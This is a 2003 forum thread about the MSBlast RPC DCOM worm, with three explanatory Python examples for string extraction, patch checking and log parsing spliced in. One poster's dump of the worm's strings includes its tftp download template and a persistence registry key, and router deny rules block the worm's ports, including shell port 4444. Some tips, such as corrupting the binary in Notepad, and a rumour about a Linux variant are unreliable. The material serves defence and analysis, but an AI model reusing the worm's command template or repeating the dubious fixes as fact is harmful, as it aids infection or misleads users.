I am pretty surprised it got us. Our network guys do a really good job of preventing this stuff from getting in. But this one hit us hard. It slowly spread through the network. My co-worker was the first I know who got it. Then it hit mine, then others in my department. It would kill RPC every 15 minutes at first, which caused my machine to reboot. Right before I got rid of it, it was killing it 30 seconds after the system came back up. Fortunately, my brother was reading Slashdot and said "oh, that sounds like the RPC DCOM worm". Sure enough, that was the problem and just had to delete msblast.exe in my registry. And to those of you who have been saying "I don't have a problem, I use a firewall". Well, we are behind a firewall too (one that is managed better than most since we are government) and it still slipped in.
Support a great indie game: http://www.abaddon360.com
After manually updating my virus definitions and explicitly pointing NAV to the file, it still reckoned it was clean. Way to go, Norton. At least the MS patch seemed to work, although I've seen some people on IRC get repeatedly raped and always before they managed to download and install the patch. Sucks for them, I guess.
The worm, aptly named msblast.exe and happily sitting in my system32 folder, sending itself to a bunch of random addresses (that happened to be in a reserved netblock and were timing out, go figure) was packed with UPX; after uncompressing and running strings on it, here are some interesting finds:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Fun, hah? Way to go you bloody wanker, you made my day. I hope SAN (your right hand) loves you too.
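The string dump above is the output of the standard `strings` tool on the unpacked binary. The block below is an added example, not code from the poster or from the worm: a minimal `strings`-style extractor run over a constructed byte buffer that embeds the same printable runs the poster listed, separated by arbitrary non-printable filler. The indicator patterns (a tftp download command line, a CurrentVersion\Run persistence key, the windowsupdate.com reference) are my own choice of what a responder would grep for, not anything the page defines.

```python
# Added example (not from the original post): a minimal `strings`-style
# extractor plus a small indicator classifier, run over a CONSTRUCTED buffer.
# The buffer is not the worm; it just contains the printable runs the post
# listed, separated by arbitrary non-printable filler bytes.
import re
from typing import Dict, List

MIN_LEN = 4  # same default minimum run length as GNU strings

# Constructed sample: printable runs separated by non-printable filler.
SAMPLE = (
    b"\x00\x01\x02msblast.exe\x00\xff\x10"
    b"I just want to say LOVE YOU SAN!!\x00\x90\x90"
    b"windowsupdate.com\x00\x00tftp -i %s GET %s\x00\x7f"
    b"ab\x00"                                   # shorter than MIN_LEN, dropped
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00\x01"
    b"windows auto update\x00"
)

# Indicator patterns (my own choice, labelled as assumptions): a tftp GET
# command template, a Run-key persistence path, and the update-site name.
INDICATORS = {
    "tftp download": re.compile(rb"\btftp\b.*\bGET\b"),
    "run-key persistence": re.compile(rb"CurrentVersion\\Run\b", re.IGNORECASE),
    "update-site reference": re.compile(rb"windowsupdate\.com"),
}


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[bytes]:
    """Return runs of at least min_len printable ASCII bytes (0x20-0x7e),
    the way `strings` does by default (no UTF-16 scanning here)."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def classify(strings: List[bytes]) -> Dict[str, List[str]]:
    """Map each indicator name to the extracted strings that match it."""
    hits: Dict[str, List[str]] = {name: [] for name in INDICATORS}
    for s in strings:
        for name, pattern in INDICATORS.items():
            if pattern.search(s):
                hits[name].append(s.decode("ascii"))
    return hits


if __name__ == "__main__":
    found = extract_strings(SAMPLE)
    for s in found:
        print(s.decode("ascii"))
    for name, matched in classify(found).items():
        print(f"{name}: {matched}")
```

Packed binaries (UPX in this case) have to be unpacked first, exactly as the poster did; run against the packed file, the extractor would return mostly UPX section names and nothing useful.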
Here's a link to the Mcafee site re: the worm. Here's a link to the source code of the worm.
SecurityFocus has an analysis for the worm here.
Three days ago I was installing XP onto my computer. During the file copy process, a couple files were corrupt and wouldn't copy, so I had to abort the process and reinstall Win98. Ironically, one of the files was RPCxxxx.dll!!!!
I really like the fact that the worm crashed my XP. Because I noticed at once something was wrong. And it kept crashing 1-5 min after logging into the net, so there was little chance for anyone to really use the exploit (thx to dynamic IP).
Cant imagine how much more packets would be flying around if all those crashing machines would be spamming the worm right now....
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?
Here's what a small POP at a dial-up wholesale provider looks like 2 minutes after an ACL application. Keep in mind this is a small POP. We also blocked 4444.
deny udp any any range 135 netbios-ss (4735 matches)
deny tcp any any range 135 139 (16343 matches)
deny tcp any any eq 4444 (80 matches)
And to all of the pecee users out there get a mac
"We can dance if we want to, we can leave your friends behind. Cause your friends don't dance and if they don't dance.
if you read /., don't run a firewall, and then complain about M$, all i have to say is, "phtttbht." linux needs patching, unix needs patching, M$ needs patching...but this worm would not propagate with a properly configured firewall in place, making the security patch a little less critical.
the fact that people are getting hit with this worm indicates that there is simply not enough education about computer security out there, or that there is too much laziness from both consumers and software licensing companies.
this worm is not an issue to people with the correct closed ports...
man rtfm
If all of you windoze users would just switch over to a mac the world would be a much happier place. **Hugs Mac**
Ive figured it was out there. All the people on shacknews that refuse to update their systems and think linux is only for l33t omfg Im cooler then j00 dudes have been asking for the last few days "what is tftp!!??"
Heh - Its like I tell all the crazy teens. If you are going to fuck like rabbits (ie use windows) then please use protection (firewall + patch patch and PATCH).
Oh well - live and learn!
Hmm...I wonder if my XBOX will start crashing whenever I try to play an online game... It does run a version of Win 2k, after all.
I'm only KIDDING, jeez!
around 11 - 12ish noon here in the midwest. Was wondering what was svchost.exe and why it was crashing so much.. thought I was alright after I installed SP3... thank god for slashdot. :-D
also called up tech support on my ISP, appears alot of activity on 135 been goin' on for past couple of weeks.
many thx to the user who posted the fix with the regedit and all.
(use "netstat" in the command prompt if you're unsure about things.. if you get hit with alot of "epmap"s .. thats prolly it. ctrl+alt+delete and take a look for the "msblast.exe" program.)
Try not to let life get in the way of living.
Besides, windowsupdate.com wouldn't have done me any good. It only seems to work in IE. I run Opera, you insensitive clods!
Stressed? Me? Of course not. Stress is what a rubber band feels before it breaks, silly.
That's not generic advice for the DCOM bug - for that you'll need to catch whichever of the MS ports are being abused this week. But it's guesswork advice for this particular instantiation of a worm that's exploiting it so you can at least slow down this one and isolate damage, and work on patching the actual holes in Windows so that you can prevent next week's worm that uses the same bug but some other inter-worm communication path from getting in.
At least on the couple of machines I've looked at, TCP 4444 isn't used for anything (there's a UDP 4444 used for Kerberos 4-to-5 conversion or something.) TFTP gets used for things like uploading operating system versions to diskless PCs and routers, and still isn't something you should be accepting from the outside world, and for the most part (YMMV) is only used by administrators who are better off stomping worms first and upgrading routerware later. The Microsoft ports are used by all kinds of Microsoft applications - you almost certainly should be blocking them to and from the outside world, but whether to block them inside your internal nets, and where, is a decision you'll need to make based on how much of which MS network products you're actually using. (e.g. you don't want to kill all your thin-client PCs by killing off their mounts of the file servers - but you also don't want them infecting each other.)
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Here's a work-around I've been talking some of my relatives through tonight. It's not something I'd normally want to expose them to, but it certainly saves me a visit to do it myself!
This quote is from Microsoft's web site regarding this vulnerability.
"... Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the Open Software Foundation (OSF) RPC protocol, but with the addition of some Microsoft specific extensions.
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP.
It makes it sound like RPC has the flaw instead of Microsoft's implementation of RPC being the problem.
http://www.askthevoid.com
I got this virus around noon today and just got it all taken care of. What you need to do is go and download the patch from microsoft. You can find it here
I suggest you first disable RPC or set the status to not restart the machine (type in services.msc in run) and then go to the site and download the patch.
I feel sorry for anyone depending on Windoze Update. Like many M$ products it's broken, at least part of the time. I'm pasting below a couple of posts from NT BugTraq and Full-Disclosure last month discussing this:
-----------------
Message: 16
Date: Wed, 30 Jul 2003 17:09:14 -0500
From: "Schmehl, Paul L" (email address removed)
To:
Subject: [Full-Disclosure] Patching networks redux
For all those experts who have mastered patching your networks, please ignore this post.
For the rest of you, testing has shown that some patch management tools are incorrectly reporting that MS03-026 is installed when it's not (notably Windows Update and Update Expert, among others.) The accuracy of the tool depends on how they check for the patch level. If they check the registry (like Windows Update and Update Expert do) they will *incorrectly* report that MS03-026 has been installed when in fact the files have not been updated. If they do MD5 checksums (like Hfnetchk or MBSA), they will correctly report the patch level.
The Retina tool from eEye (and I would assume the IIS commandline tool as well) is correctly reporting what *is* patched and what is *not* patched, so you need to rely on those to give you accurate information. You could actually have users going to Windows Update and finding no patches available when in fact they are still vulnerable. You could also have users for whom you've pushed out the patch who have overwritten the files with older versions, yet your tools are reporting them as patched.
Of course the experts never have these problems, but for the mere mortals, caveat emptor.
Paul Schmehl (email address removed)
Adjunct Information Security Officer
The University of Texas at Dallas
-----------------
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0307&L=ntbugtraq&F=P&S=&P=9218
MS03-026 - are you patched? Windows Update isn't sure!
FYI, it is worth reminding people that some patch checking tools don't do a complete check. Windows Update doesn't check files, and it would seem that other products have problems also.
Some tools only check for the presence of a registry key indicating that a hotfix was applied. Other tools, such as Shavlik's HFNetchk and MBSA (and others) actually check file details, including a checksum, to verify that the files in play are actually the right versions.
I was speaking with Jeff.t.Parker @ hp.com about this issue. His observations confirm this (see below). If patched files are reverted to previous versions, for whatever reason, Windows Update and (at least in this case) Update Expert (and possibly other such tools) will incorrectly assert you have the patch applied when in fact you don't.
He wrote in to advise that Update Expert (v6.0 build 6069) is giving erroneous results at least in some cases. After applying SP4 concurrently with MS03-026 (using Update Expert), Jeff noticed some interesting results. The resulting versions of the files contained in MS03-026 on some machines were;
5.0.2195.6692 ole32.dll
5.0.2195.6701 rpcrt4.dll
5.0.2195.6702 rpcss.dll
This led to Windows Update and Update Expert both reporting that the systems had MS03-026 applied (wrong). MBSA and eEye's Retina both said the systems *did not* have MS03-026 applied (right).
While this may be a problem with the way Update Expert deploys Service Pack + Hotfix combinations, it also demonstrates the problem Windows Update has by not being able to examine file details (relying only on registry entries).
How many systems are out there now who believe they have MS03-026 applied, can't get it offered to them from Windows Update, but in fact don't have it applied at all??
Cheers, Russ - NTBugtraq Editor
-----------------------
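The two quoted posts make one point: a registry-key check answers "was the hotfix installer run?", while a file-level check answers "are the vulnerable binaries actually replaced?", and only the second survives a service pack or rollback overwriting the files. The block below is an added example, not code from either post or from any of the tools named: it models both checks over a constructed host inventory. The three file names are the ones the post lists; the minimum versions in REQUIRED are assumed placeholders chosen to be above the post's numbers, not the real MS03-026 file versions, and "MS03-026" stands in for whatever registry key the real installer writes.

```python
# Added example (not from the NTBugtraq / Full-Disclosure posts above).
# Two verification strategies side by side:
#   registry_says_patched(): key present => "patched" (Windows Update style)
#   file_check():            every shipped file at or above a minimum version
#                            (MBSA / HFNetChk style)
# REQUIRED holds ASSUMED placeholder versions, not the real MS03-026 numbers.
from typing import Dict, Set, Tuple

Version = Tuple[int, ...]


def parse_version(s: str) -> Version:
    """'5.0.2195.6692' -> (5, 0, 2195, 6692). Comparing tuples of ints avoids
    the classic bug of comparing version strings lexicographically."""
    return tuple(int(part) for part in s.split("."))


# ASSUMED minimum file versions, for illustration only.
REQUIRED: Dict[str, Version] = {
    "ole32.dll": parse_version("5.0.2195.6700"),
    "rpcrt4.dll": parse_version("5.0.2195.6710"),
    "rpcss.dll": parse_version("5.0.2195.6710"),
}

HOTFIX_KEY = "MS03-026"   # stand-in for the installer's registry marker (assumed)


def registry_says_patched(hotfix_keys: Set[str]) -> bool:
    """Registry-only check: the marker exists, so the tool reports 'patched'."""
    return HOTFIX_KEY in hotfix_keys


def file_check(file_versions: Dict[str, str]) -> Dict[str, bool]:
    """File-level check: each binary the hotfix ships must be at or above the
    required version. A missing file counts as version 0.0.0.0 (unpatched)."""
    return {
        name: parse_version(file_versions.get(name, "0.0.0.0")) >= required
        for name, required in REQUIRED.items()
    }


def is_patched(hotfix_keys: Set[str], file_versions: Dict[str, str]) -> Tuple[bool, bool]:
    """Return (registry verdict, file verdict) so a disagreement is visible."""
    return registry_says_patched(hotfix_keys), all(file_check(file_versions).values())


# Constructed inventory reproducing the SP4 + hotfix case from the post: the
# registry marker is present but the files carry the versions the post lists.
REVERTED_HOST = {
    "hotfix_keys": {HOTFIX_KEY},
    "files": {
        "ole32.dll": "5.0.2195.6692",
        "rpcrt4.dll": "5.0.2195.6701",
        "rpcss.dll": "5.0.2195.6702",
    },
}

if __name__ == "__main__":
    reg, files = is_patched(REVERTED_HOST["hotfix_keys"], REVERTED_HOST["files"])
    print(f"registry says patched: {reg}, files say patched: {files}")
    for name, ok in file_check(REVERTED_HOST["files"]).items():
        print(f"  {name}: {'ok' if ok else 'BELOW REQUIRED'}")
```

The practical rule the posts arrive at follows directly: trust the verdict that looks at the files, and treat a registry-only "patched" as unverified until a file-level scan (or a checksum, where the vendor publishes one) agrees.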
I work tech support for an ISP. We are getting a lot of calls from customers that have already been infected. Once this is the case, and you attempt to install the patch, the system will not allow you to shutdown or restart in a normal manner. So the registry writes are not done, in effect not even installing the patch. The other scenario we have seen is that if you DO get the patch to install, the RPC service is shutdown midway, and kills the install process, and throws the machine into a infinite loop of reboots. At this point... I'm thankful I run Linux. This just provides one more piece of ammunition for the pro-Linux debate.
Are you whoring for karma today ?
... just make it good).
... oh wait ... this is Slashdot ...
The first sentence read "correct a security vulnerability in a Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface".
Don't know how you could think that Microsoft was misleading anybody (by all means, slam Microsoft
You could only be misled if you ignored the rest of the article in question
Cheers,
JAKD
spam popups every day; port 135 wide open, DCOM blazing away
Post-SP3:
no popups; port 135 still wide open, but not much there because DCOM is now DISABLED.
Like I said: it's just a "junk box" I setup the other day because the power supply died in my "good" server box. I haven't installed the googleplex of win2k patches because I don't think it's worth it - I'm only using it temporarily and if it gets hit I'll reinstall the OS (or stick a freesco floppy in the drive and reboot). This is just something I noticed when I read today's "warning" and went into that machine to disable the offending service.
What can I say but, gotta love them M$ $ploits!
And what's so odd about this is that it's not your daily buffer overflow..
What I do hate about this is that it does hammer my poor friends that are to afraid to switch to Linux.
This is like the Stockholm Syndrome. They've become attached to their captor/tormentor and are afraid to let go. Windows is more powerful than heroin or tobacco..
Ecora Patch Manager
Alternative "fix" to the 22 steps one:
1) insert knoppix cd in drive
2) reboot computer
3) activate booting from cd in bios
Of those to whom much is given, much is required.
So, it's been about 5 days since my computer started crashing. Actually, it didn't totally crash, but DCOM kept crashing, and occasionally RPC would crash and I'd be forced to reboot. No biggie, it only happened once that I noticed. A more common problem was Mozilla staying memory resident after I closed it out, and sucking up 50 MB of RAM (not Windows's fault). So I got used to CTRL+ALT+DEL'ing, and closing it manually. But suddenly, one day last week, Program Manager kept crashing - but not...it was closing. I did a series of rapid CAD's, and saw a program that was obviously bull. A quick trip through the registry turned up the "WindowsSuckz 4 Driver - gloaub.exe". Turned out I had a worm which was installing a backdoor. My computer could have been used as a DOS zombie, or they could have installed keylogging software! I felt....DIRTY.
/dev/ team over at America's Army will get my v1.9 for Linux edition out soon enough.
So I said "screw Microsoft". I've been a good boy. I apply an endless march of patches, service packs, hotfixes, and upgrades - more often than necessary IMHO. Well Microsoft didn't post a fix for this until nearly two weeks after it was discovered in the wild! By contrast, I remember the last Linux server I ran, a vulnerability was discovered in Apache+SQL that allowed backdoor access to a Linux system. Before my sweaty hands had finished an executive summary for da boss, a fix was issued. Literally...TWO HOURS for OpenSource to fix a bug vs Microsoft taking TWO WEEKS!
Well I had dabbled in Linux for a while, I felt confident, and I was impressed by the latest round of offerings from RedHat, Suse, Mandrake, and Knoppix. So, I switched. I now run KDE, I use XawTV for my tuner card, Xine for playing DVD and video files, CUPS lets me print even over a network, SAMBA lets me share files....hell, you get the idea. The only thing I can't do is play windows games. I left a clean WinXP install for playing games until Wine gets that little "reentrant libc" issue fixed, and I'm sure the
Microsoft might have to learn about free market competition the hard way - by competing with an OS that is not only free, but better.
Windows can be made more secure by editing the registry to turn off some of the network services. The steps recommended in the following Windows security page are somewhat of a pain to do, but are useful.
Minimization of network services on Windows systems
http://www.hsc.fr/ressources/breves/min_srv_res_win.en.html
For those with 2.4.x kernels try on your upstream connection (as root):
# iptables -I INPUT 1 -i ppp0 -p tcp --dport 135 --syn -j LOG --log-level info
Now sit back and watch your console/x-console or tail the appropriate log file while the packets come in (with source address may I add...)
I'm getting about 3-4 connection attempts per min. and I'm on dialup!
NOTES:
1- Change ppp0 above to the name of your Internet interface if not using ppp0 (ie. eth0, eth1, etc)
2- Do not do the above if you receive normal traffic on port 135 (if you have a Windows share exposed on said interface, ie. through samba) or your logs will be swamped.
perhaps it's time to get a real operating system and quit playing with insecure toys.
and several sites are now listing Linux (most versions) now vulnerable to a variant emerging in the last two hours in Europe. Apache servers mostly.
My network got hit over port 80 on the firewall, a port left open for certain services... all of my workstations sans one test workstation with the patch in place were hit, and two servers out of four. The fix is NOT in autoupdate for XP, you have to do the manual update to get it.
Nice try, but that bit about having a girlfriend was Just Too Obvious.
Someday, you're going to die. Get over it.
I've had iptables logging port 135 accesses for about two hours now. 55 total attempts, 44 from unique hosts. Most within my ISP. Wheee!
*sigh*
One line blog. I hear that they're called Twitters now.
In order to patch an infected system while connected to the net do the above steps; look for both MSBLAST and msblast in the registry.
Also create a /windows/system/msblast.exe file and then keep it open with Word. The file lock kept the msblast.exe from restarting on my system when connected to the net.
!joatlanta@@yahoo.com
Or you could just stop at step 1. It'll be extremely secure in that configuration...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Just bought my wife a new XP machine - because she has been having issues with the crappy linux boxes I have given her [300mhz should be fast enough for anyone...](all of my machines are Linux - daughter has an old win98 and a linux box on kvm).
She complained that her computer was shutting down all day - get this, I don't have any ports enabled on my router - it's closed tighter than a duck's ass.
So, I'm sitting there, and she decides to turn her machine back on - a few minutes later....BAM...my whole DSL network goes down.
So, not making the cause and effect connection, I call my local phone company. They are able to ping my DSL modem. So they go through the motions, and get me to hook up my XP machine to the network directly through the DSL modem...friggin' brilliant. I hook it up, and ...BAM! again... This time it's an 'RPC' call error - 'shutting system down' message. Crap. I shut the system down and pull it completely off the network.
I then check my Linksys router - everything on it is reset to the defaults...everything. No PPPoE settings, no password [it's set to the default] - nada, nothing, zip.
I reset everything, and up comes my network - that's when I browse on over to /. and see this post about the worm. I do a little forensics and find the c:\winnt\system32\msblast.exe, and c:\winnt\system32\pre[a-Z*]\msblast.exe.23oiu4i734 - I assume the pftp scratch file. Son-of-a-bitch.
I also look for the registry entry to restart the worm - but don't find it (so far, so good). I delete the scratch file ok, but the msblast.exe file will not delete (the system says the wheel user isn't authorized - what kind of Mickey-Mouse operating system is this!!?)
I want to know:
1. how to clean this up?
2. how the hell did this thing ZAP my Linksys with all the ports disabled?
3. where the hell can I get my $99 back for this bogus operating system?
Lodragan Draoidh
The more you explain it, the more I don't understand it. - Mark Twain
Let's hang some stats in a thread..
:)
I've had 302 hits from 17:30 to 21:30 with the top 5 heavy hitters coming from my Comcast neighbors in Bensalem - 77, Wallingsford - 62, Lower Merion - 55, Jamieson(?) - 25, and Levittown, PA with 18 infected hosts.
Come on Bensalem, call your neighbors and tell 'em to patch!!
Intelligent Life on Earth
This thing is getting around quickly...
Aug 11 21:43:29 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.233.77.64 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=26462 DF PROTO=TCP SPT=1951 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 11 21:43:30 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.235.38.60 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=59390 DF PROTO=TCP SPT=4309 DPT=135 WINDOW=64240 RES=0x00 SYN URGP=0
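Several posters in this thread are doing the same thing by hand: counting port-135 SYNs in their firewall logs and working out how many distinct hosts are behind them. The block below is an added example, not code from any poster: a parser for netfilter LOG lines of the exact shape shown above, with a per-port summary (attempts and distinct sources) and a top-talkers list. The first two log lines are the two from the post (with the same masked destination); the remaining three are constructed to show a repeat source, a hit on the worm's 4444 shell port, and an unrelated port-80 SYN that should be counted separately. The "fw:" prefix and field names are whatever the poster's ruleset emitted; nothing else is assumed.

```python
# Added example (not from the original post): parse netfilter LOG lines and
# summarise SYNs per destination port, the way posters counting "hits" and
# "unique hosts" did by hand. The first two lines are the post's own; the
# other three are CONSTRUCTED (192.0.2.0/24 is a documentation range).
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

LOG_LINES = """\
Aug 11 21:43:29 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.233.77.64 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=26462 DF PROTO=TCP SPT=1951 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 11 21:43:30 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.235.38.60 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=59390 DF PROTO=TCP SPT=4309 DPT=135 WINDOW=64240 RES=0x00 SYN URGP=0
Aug 11 21:44:02 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.233.77.64 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=26470 DF PROTO=TCP SPT=1952 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 11 21:44:15 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=192.0.2.7 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=64 ID=100 DF PROTO=TCP SPT=3000 DPT=4444 WINDOW=65535 RES=0x00 SYN URGP=0
Aug 11 21:44:20 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.235.38.60 DST=66.236.160.x LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=59391 DF PROTO=TCP SPT=4310 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0
"""

# netfilter LOG fields are KEY=VALUE tokens; MAC= may legitimately be empty.
FIELD = re.compile(r"(\w+)=(\S*)")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the KEY=VALUE fields of a netfilter LOG line, or None for lines
    that are not firewall log records (no IN=/SRC=/DPT= fields)."""
    fields = dict(FIELD.findall(line))
    if not {"IN", "SRC", "DPT"} <= fields.keys():
        return None
    return fields


def summarise(lines: str) -> Dict[str, Tuple[int, int]]:
    """Per destination port: (TCP SYN attempts, number of distinct source IPs)."""
    attempts: Counter = Counter()
    sources: Dict[str, set] = defaultdict(set)
    for line in lines.splitlines():
        f = parse_line(line)
        # Only count connection attempts: TCP with the SYN flag logged.
        if f is None or f.get("PROTO") != "TCP" or " SYN " not in line:
            continue
        attempts[f["DPT"]] += 1
        sources[f["DPT"]].add(f["SRC"])
    return {dpt: (attempts[dpt], len(sources[dpt])) for dpt in attempts}


def top_sources(lines: str, dpt: str = "135", n: int = 5) -> List[Tuple[str, int]]:
    """Most active sources against one port, e.g. for a report to the upstream ISP."""
    counts: Counter = Counter()
    for line in lines.splitlines():
        f = parse_line(line)
        if f is not None and f["DPT"] == dpt:
            counts[f["SRC"]] += 1
    return counts.most_common(n)


if __name__ == "__main__":
    for dpt, (hits, uniq) in sorted(summarise(LOG_LINES).items(), key=lambda kv: -kv[1][0]):
        print(f"port {dpt}: {hits} attempts from {uniq} distinct hosts")
    print("top sources on 135:", top_sources(LOG_LINES, "135"))
```

Counting distinct sources rather than raw hits is what separates "one infected neighbour retrying" from "many infected hosts", which is the number worth passing to the ISP's abuse desk.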
It's called patching, the day it was announced. Slashdot even had an article on the thing.
"Sufferin' succotash."
Trend Micro says that this worm performs a DDoS to Windows Update Site, I'm not really sure about removing it...
-- When did Ignorance Become a Point of View?
Worms are just the internet's way of Darwinism. Every 6 months or so, you have to wake up the masses to the concept of patching.
Same goes for the really dumb viruses, like the love bug. Notice how they're always spread about 6 months apart?
See you in another 6 months....
To delete the msblast file, you may have to first open Task Manager, click the Processes tab, highlight the "msblast" process and hit the "End Process" button...then try to delete the file.
I work at a isp and we are getting slammed with calls!!!!!!!
This site is good too: http://blackviper.com/
Damn this thing caused me hell fixing my parents XP box tonight. Every time I'd get online to download the patches for it the damn thing would be touched by the worm and would reboot itself. Very annoying when downloading patches over a 56K modem.
At what price learning? At what cost wisdom? The price is a man's peace of mind, and the cost is his life.
told ya!
It doesn't change the facts, tho, does it?
Hahahahaha!
I've had that patch installed on my windows box(es) since August 4th via windows update.
I got the RPC message when ICQ automatically downloaded some patch. It kept restarting me only when I was online. I then changed the windows XP key (via corp key changer) and it worked. No more problems. I GOTS HAXORED DAMMIT
Friday morning I found my system was rebooted and sitting at a Linux prompt (I dual boot). I couldn't figure out why except the night before I had to do a reinstall of my system and previously had the Windows firewall running. Later on Friday and into Saturday I'd get system messages that RPC service terminated unexpectedly. I could never figure out the problem. Then my ex-girlfriend gets it this morning and when I get home I fight to deal with about 10 reboots in less than a 2 hour period at random times. She calls Dell and they alert her to the worm. She then alerts me that its a worm. I then use linux to do some research on it.
Short story is to delete msblast.exe from c:\windows\system32 either from linux or from a bootup dos prompt (otherwise you get access denied while in windows). Then install the patch at That's for the XP 32bit version. Win2k version is about 850k, 500k less than the XP version.
this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
JESUS, this is the most virulent worm I've ever seen! I personally know ten people who have been infected this morning alone.
-----
PGP Key ID 0xCB8FF658
Hey, writing on drugs helped The Beatles sell merchandise...
I can't think of a good sig...
Washington Post article, Aug. 11
My network at work was infected, making today's day at work virtually work-less. Patches were installed, systems were scanned, blah blah...what a pain in the ass!
Trust me, I have one running in a Netware shop.
my concern is the bandwidth consumption of these kind of worms. It may not eat bandwidth like Slammer did, but it still impacted my download speeds...
:(
My poor torrents
Never underestimate the predictability of human stupidity...
The post wasn't a troll, merely redundant; in the same way that "monsoon season" is redundant.
I've been lazy lately with updating my windows box and managed to get this virus today. My machine was telling me it was going to shutdown within roughly ONE MINUTE from the time I started its internet connection. Nasty...
Anyway, the one thing I found that killed them both is Notepad. Just open up the executable in Notepad, type a few random characters here and there, erase some things, mess up the file header, and then save right over the virus! They're never expecting that. Make sure to kill the virus processes first, of course, or else you'll get the infamous "access violation". (In the case of msconfig32.exe, you must use the command-line tools 'tasklist' and 'taskkill') The viruses might restore themselves if you remove them from the registry, or delete the file, but they're not expecting you to corrupt the executable. If Windows, in its infinite stupidity, tries to run the virus again, it will fail harmlessly.
P.S. I know, I know, you're wondering why I'm running an unpatched XP install on my desktop. Well, I just reinstalled, and only have dialup, and I'm going back to college in a month where there's super-broadband. Downloading 30+ MB (conservative estimate) of service packs, patches, hotfixes, and updates over dialup (not even 56k, more like 28.8) seems pointless. Besides, it's interesting seeing actual virus infections happen and fixing them myself. If anything goes horribly wrong, I have my XP cd right here to reinstall again. I'll be reinstalling and patching when I get back to a real internet connection.
main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
Man, they made me put my slackware box up in the bathroom! IN THE BATHROOM! "The basement is full" they said. I already have to sleep Harry Potter-style under the stairs! You may have to run complicated networks, but I bet your Big Iron doesn't need a freakin' de-humidifier!
This has been a joke. If it were other anything than a joke, you have laughed would have.
When I first encountered this, my first attempt was to open the Task Manager, but I couldn't; the window was instantly closed. Tried again... same result. I tried to open MSCONFIG to try to at least disable it and buy myself enough time to run windows update... it instantly closed. Only after I ran windows update did I escape this crap worm.
Anyone else have trouble with Task Manager and MsConfig?
You think they'd actually ftp to their own boxes? Those are "rooted" boxes for sure.
I've been lazy lately with updating my windows box and managed to contract this virus. In roughly ONE MINUTE of firing up the my internet connection my machine was already shutting itself down. Nasty...
If I scan the network for PCs that listen on port 4444, will I get a list of compromised hosts ?
Insensitive clod!
Does it have anything in common with the bug in Windows discovered by Polish group.
So I'm reading this article and the "Billy" Text and thinking what a fool the guy who wrote the exploit. By openly challenging MS, this will incite MS to further tout Palladium and all the other silly "Secure computing" initiatives...Let's Just say...I hope y'all LOVE using smartcards and 'activating' applications and using only 'signed' applications... Keep doing sh** like this and we'll all be 'locked down'.
No! Do not have auto-update on. This will cause problems in a production environment. For example, SP4 does fine until it finds a server that you have actually attempted to harden using M$ IIS lockdown tool - the lockdown tool will make changes to the IIS server that SP4 will also attempt to make - the SP4 installation will crash.
Sig? We don't need no stinking sig....
It seems that it had caused a worldwide panic!
:)
I am a university student in mainland China; we connect to the internet via the firewall of our university. In recent days, many computers in the local network were attacked by hackers using the RPC vulnerability. PCs which were attacked reboot without any reason. Some displayed "svchost.exe runtime error! The computer is going to shutdown within 60 seconds..."
Someone told me to run Dcomcnfg.exe, and that disabling "Windows Distributed Component Object Model" would help. I was wondering why, and if that really works. I have installed the patch for Windows XP, so I can't check it myself.
ps: It is the first time to post reply on slashdot.org.
Philip Hsie! Make it possible!
winblast.exe , look for it in the reg. and c:\windows\system32
About using Windows 98 SE: it's so old no one writes viruses for it anymore ;-)
For the perfect birthday gift , you A**H*LE!!
If you get hit, and the computer wants to shutdown, just go into the cmd prompt and type shutdown /a
Happy Penguin :)
(sorry, couldn't resist)
Have a nice day - I am.
But seriously. Wasn't W2k3 part of Bill's new secure software initiative? I feel really bad about all those locked in end users. They don't understand this stuff and all they know is that that new OS from M$ is no different than the previous version - unsafe at any speed.
Ok so Bill Gates essentially fulfilled his promise related to making an OS that everyone can use. Ya, Joe and Jane Average can do all their music, and movies, and web content, and IM chat, etc... But they spend long hours on the phone with tech support. Now a worm is out that circumvents the patch. Most people won't likely be able to fix the problem and get online to get the patch before they're hit again.
With all the time and money average users spend trying to maintain, fix, and update their system, they might as well make the switch and learn to run Linux or change to Mac.
